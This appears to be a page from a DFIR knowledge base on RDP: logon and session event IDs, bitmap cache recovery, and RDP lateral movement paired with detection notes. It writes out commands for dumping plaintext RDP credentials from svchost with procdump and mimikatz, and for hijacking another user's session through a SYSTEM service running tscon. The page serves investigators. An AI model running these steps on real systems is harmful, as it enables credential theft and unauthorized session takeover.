📘
DFIR
  • Networking
    • Networking
      • SDWAN
      • VLANs
      • Virtual Networking
      • Segmentation
      • Applications
        • PAM/SSO
          • Privileged Password Management
          • Authentik
          • Beyond Trust
          • Cyberark
        • Network Tools
          • Palo Alto
          • Sonicwall
          • ZScaler
          • Firewalls
  • Windows
    • Administration
      • Honeypot
      • Deployment
      • Rogue Devices on Network
    • Forensics
      • System Info
      • Memory
        • Pagefile.sys
        • PowerShell Dump
        • Memory Forensics
      • Network Logs
        • UAL
        • Page 1
      • File System
        • Mounting File Systems
        • Log2Timeline
        • Volume Shadow Copies
        • $I30
        • UsnJournal/$LogFile
        • MFT
        • NTFS
        • Shellbags
        • Recycle Bin
      • Registry
        • Logged in Accounts
        • TypedPaths
        • WordWheelQuery
        • Page 5
      • Network Share
      • Exfiltration
        • RDP Clipboard
        • Exfil Exercise
        • DNS Over HTTPS
      • Evidence of Execution
        • Sum UAL
        • Office Apps Forensics
          • LastVisitedPidlMRU
          • File MRU
          • Trusted Documents
        • Run MRU
        • RecentDocs
        • FeatureUsage
        • BAM
          • DAM
        • Prefetch
        • Shimcache
        • RecentApps
        • AmCache
        • PCA
        • MUICache
        • UserAssist
        • SRUM
        • LNK Files
        • JumpLists
      • Hacktool Artifacts
        • DCSync
        • Impackets
          • GetUserSPN.py/Kerberoasting
          • Page
        • Psexec
        • Web Shells
        • BloodHound
      • Event Logs
        • Event Log IDs
          • SMB
            • 30803 Failed to Establish a Network Connection
            • 31010 SMB Client Failed to Connect
            • 551 SMB Auth Failed
            • SMB Forensics
          • 4740 Account Lockout
          • 4642 Logon
          • 5156 Show App IP Connections
        • Windows Defender
        • LOLBins
          • WebDav
          • Crashes (WER)
          • PowerShell
          • Scheduled Tasks
          • Services
          • WinRS
          • WinRM
          • RDP
            • 1024 RDP ClientActiveX is trying to connect
          • WMI
        • DNS Logs
        • Application NTDS.dit
        • Kerberos
        • Exchange
        • GPOs and OUs
        • Anti Forensics
      • 3rd Party Apps
        • IIS
        • Kubernetes
        • GitHub
        • Jenkins
        • Snowflake
        • Misc
          • Veeam
          • MongoDB
        • "TA Tools"
          • Ngrok
          • 7-Zip
          • PDQ Deploy
          • TotalCMD
          • WinSCP
        • Identity Apps
          • Okta
        • Microsoft
          • Microsoft Teams
          • VS Code
          • Excel
          • Notepad
        • SysInternals
          • PsExec.exe
        • RMM
          • ScreenConnect Forensics
          • AnyDesk
        • Zoom
        • Browser Forensics
          • Recovering Deleted History
          • Browser Artifacts
      • Example Page
    • Cheat Sheet
      • Red Team:
      • Windows Event Logs
      • Quick Wins
      • Docker
      • Admin
      • Zimmerman
    • Investigation
      • Malware Analysis
        • Macros Analysis
        • Packers
      • Persistence
        • Host Based Persistence Cheatsheet
        • M365 Persistence Cheatsheet
      • DFIR Tools
        • Volatility
        • Velociraptor
        • KAPE
        • Logman
      • Insider Threats
      • Scattered Identity
    • Internals
      • Structure
        • SMB
          • Admin
          • Attacks
        • Alternate Data Streams
        • Protocols
          • Wdigest
          • DPAPI
          • Kerberos
          • NetLogon
        • WinAPI
        • COM Objects
        • Files Types
        • DLLs
          • Attacks
            • Reflective DLL Injection
            • DLL Hijacking
        • Folders of Interest
      • Privileges
        • UAC
      • Applications
        • Werfault
        • Process Creation
        • Pipes
        • AMSI
        • LOLBins
          • xCyclopedia Index (EXEs)
          • WMI
          • Certutil.exe
          • Rundll32.exe
          • Schtasks.exe
          • Svchost.exe
          • DLLHOST.exe
          • MSIExec.exe
        • PowerShell
          • VBS
          • Forensics
          • Classes
          • Logging
          • PowerShell Modules
        • LSASS
          • Lsass Forensics
    • Active Directory
      • Internals
        • Sysvol
        • Attributes
      • Secure AD
        • Logs
        • Credentials
          • Restricted Admin Mode
          • LAPS
      • Attacks
        • Vulnerabilities
          • ViewState
          • ProxyShell
          • OWASSRF
        • Credential Theft
          • DCSync
        • ADCS
      • MSSQL
        • Admin
        • Attacks
    • MISC
      • Offensive Tool Analysis
      • Investigating Specific Activity
        • User Account Deleted
      • Dumping Domain Hashes with IFM Images
      • Lateral Movement
      • Advanced Obfuscation
      • SCCM
      • Malware Traffic
  • Linux
    • Forensics
      • Cron Jobs
      • File System Types and Timestamps
      • LD_PRELOAD
      • Linux Auditing Logs
      • example page
      • Process Accounting (pacct)
      • mlocate.db
    • SSH
    • Linux WebShells
    • Directories of Interest
    • Internals
      • Logs
      • File Descriptors
      • GTFOBins
  • Enterprise Architecture
    • CI/CD Pipline
      • Jenkins
    • Citrix
      • XenApp
      • Pentesting Guide
      • Forensics
    • Web Applications
      • JWT: JSON Web Tokens
      • Apache
        • CGI-Bins
      • ColdFusion
        • Attacking ColdFusion
    • The Cloud
      • AWS
        • Cases
        • Misconfigurations
        • Attacking AWS
          • SES
          • Privilege Escalation
        • Fundementals
          • Hierarchy
          • Roles
          • Security Services
          • IAM
            • Keys
          • CloudTrail
          • Services
            • S3
            • SES
      • Azure
        • Hunting
        • Admin
        • Securing Azure
          • CA Policies
        • CheatSheet
        • Detections
        • Forensics
        • Attacking Azure
          • Persistence
            • Cloud VMs
            • Applications
            • SSPR/MFA
          • Credential Theft
            • Golden SAML Theft
            • Attacking key vaults
            • Skeleton Keys (PTA Abuse)
            • Family of Client IDs
            • Token Theft
          • Initial Access
            • Subdomain Takeover
            • Authenticated Recon
            • Unauthenticated Recon
            • Password Spraying M365
            • Password Spraying OWA
            • OAuth 2.0 Abuse
            • Device code authentication abuse
            • M365 Business Email Compromise
          • Page 6
          • Test Page
        • Fundementals
          • Security/Service Principals
          • Tokens
          • Hierarchy
          • Roles
          • Architecture
          • Conditional Access
        • Logging
          • Audit Logs
      • M365
        • Forensics
          • Tokens
        • Business Email Compromise
        • Hardening
      • Cloud Labs
    • vSphere
      • Forensics
      • Hardening
      • Admin
    • Containers
      • Troubleshooting
      • Linxserver.io
      • Container Forensics
        • Docker Logs
      • Kubernetes
    • Troubleshooting
      • Cheatsheet
  • Mac
    • Forensics
      • Page 3
  • Attacker Information
    • Adversary Operations
      • c99 Webshell
      • Page 2
    • Actor Playbooks
      • TA Infrastructure
    • Abused Domains
  • IR Playbook
    • Activity from Unmanaged Host
    • Recommendations
  • Reverse Engineering
    • Python - Pyinstaller
Powered by GitBook
On this page
  • Event Logs:
  • Disconnect/Reconnect: 4778/4779
  • Forensics:
  • Souce and Destination artifacts:
  • Bitmap Cache
  • RDP Clipbaord Forensics
  • RDP Lateral Movement
  • Dump Passwords in Terminal Services:
  • Dump saved credentials via DPAPI:
  • Tscon to hijack open RDP connections:
  • Rogue RDP:
  • RDP Files:
  • Anti-Forensics:
  1. Windows
  2. Forensics
  3. Event Logs
  4. LOLBins

RDP

PreviousWinRMNext1024 RDP ClientActiveX is trying to connect

Last updated 1 year ago

Event Logs:

Disconnect/Reconnect: 4778/4779

Forensics:

Souce and Destination artifacts:

Bitmap Cache

Bitmap cache will cache still standing images of an RDP session so that they can be referenced instead of retransmitted. The purpose of this is to optimize RDP session.

We can leverage this artifact to collect what the TA saw during the RDP session. Useful for proving what a TA might've opened or actions they performed.

File Location:

  • C:\Users\USERNAME\AppData\Local\Microsoft\Terminal Server Client\Cache\*

Cache files are stored in .bin files.

Execute bmc-tools:

bmc-tools.py -s ./ -d ./output

The output images will be saved to output folder.

We can then stitch together these image pieces using RDP Cache Sitcher.

Grab the compiled release version of the software and then open up the directory the image tiles are stored in. We can then stitch together tiles to make a complete image.

RDP Clipbaord Forensics

RDP Lateral Movement

RDP credentials are stored in LSASS of the target computer. The plaintext passwords can be dumped from LSASS using mimikatz.

Introduced in Windows Server 2012 R2 and Windows 8.1, Restricted Admin mode provides additional security to remote logon scenarios. This mode of Remote Desktop causes the client application to perform a network logon challenge-response with the NT one-way function (NTOWF) or use a Kerberos service ticket when authenticating to the remote host. After the administrator is authenticated, the administrator does not have the respective account credentials in LSASS because they were not supplied to the remote host. Instead, the administrator has the computer account credentials for the session. Administrator credentials are not supplied to the remote host, so actions are performed as the computer account. Resources are also limited to the computer account, and the administrator cannot access resources with his own account.

Dump Passwords in Terminal Services:

  1. Query svchost running Terminal Services.

#service
sc queryex termservice

#task running rdpcorets
tasklist /M:rdpcorets.dll

#netstat for TermService
netstat -nob | Select-String TermService -Context 1
  1. Dump process or select-string for password in memory.

#select string for password hint, difficult to find unless you know it.
strings -el svchost* | grep Password123 -C3

#dump process with task manager or procdump
procdump64.exe -ma 988 -accepteula C:\Users\pentestlab

#mimikatz rdp extract
privilege::debug
ts::logonpasswords

Detection:

  • Look for .dmp files on the host.

Dump saved credentials via DPAPI:

Credential Manager Location:

  • C:\Users\username\AppData\Local\Microsoft\Credentials

  • Credentials are stored in Credential Manager, not in .rdp files.

  • .rdp files reference credential manager for creds.

Detection:

Tscon to hijack open RDP connections:

  1. Requires SYSTEM privs to accomplish.

psexec -s \\localhost cmd

Another method is to create a service that will connect selected session to ours.

  1. Get all sessions information:

C:\Windows\system32>query user
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 administrator                             1  Disc            1  3/12/2017 3:07 PM
>localadmin            rdp-tcp#55          2  Active          .  3/12/2017 3:10 PM

C:\Windows\system32>
  1. Create service which will hijack user's session:

C:\Windows\system32>sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"
[SC] CreateService SUCCESS
  1. Start service:

net setart sesshijack

Detection:

  • Event IDS4778 (logon) and4779(logoff) events can be used to figure out which desktop sessions got disconnected/reconnected.

  • Tscon running as SYSTEM

  • Tscon executed as SYSTEM from persistence method scheduled task, service, WMI, etc.

Rogue RDP:

RDP Files:

.rdp files are plaintext config files.

  • Credentials are stored in Credential Manager, not in .rdp files.

  • .rdp files reference credential manager for creds

Anti-Forensics:

13Cubed
Tracking and Analyzing Remote Desktop Connection Logs in Windows | Windows OS HubWindows OS Hub
RDP Log Hunting
Windows Security Log Event ID 4624 - An account was successfully logged on
4624 Logon Microsoft
Fantastic Windows Logon types and Where to Find Credentials in ThemAltered Security
Logon Types and Mimikatz Impact
4779(S) A session was disconnected from a Window Station. - Windows SecurityMicrosoftLearn
4778(S) A session was reconnected to a Window Station. - Windows SecurityMicrosoftLearn
Do You Even Bitmap Cache, Bro?All Things DFIR
Logo
Logo
Logo
Logo
GitHub - ANSSI-FR/bmc-tools: RDP Bitmap Cache parserGitHub
GitHub - BSI-Bund/RdpCacheStitcher: RdpCacheStitcher is a tool that supports forensic analysts in reconstructing useful images out of RDP cache bitmaps.GitHub
How to Perform Clipboard Forensics: ActivitiesCache.db, Memory Forensics and Clipboard History
Logo
Credentials Processes in Windows Authenticationdocsmsft
Dumping Plaintext RDP credentials from svchost.exen00py1
svchost – Penetration Testing LabPenetration Testing Lab
4778 Reconnect to existing session
4779 Disconnects from session
Logo
Logo
Logo
Logo
Passwordless RDP Session Hijacking Feature All Windows versions
RDP Hijacking for Lateral Movement with tsconRed Team Notes
Rogue RDP – Revisiting Initial Access Methods - Black Hills Information SecurityBlack Hills Information Security
How to save RDP credentials into a file?Super User
Delete Recent RDP History Entries from the Start Menu and Taskbar (JumpList)Medium
Logo
Logo
Logo
Logo
Logo
Logo
Logo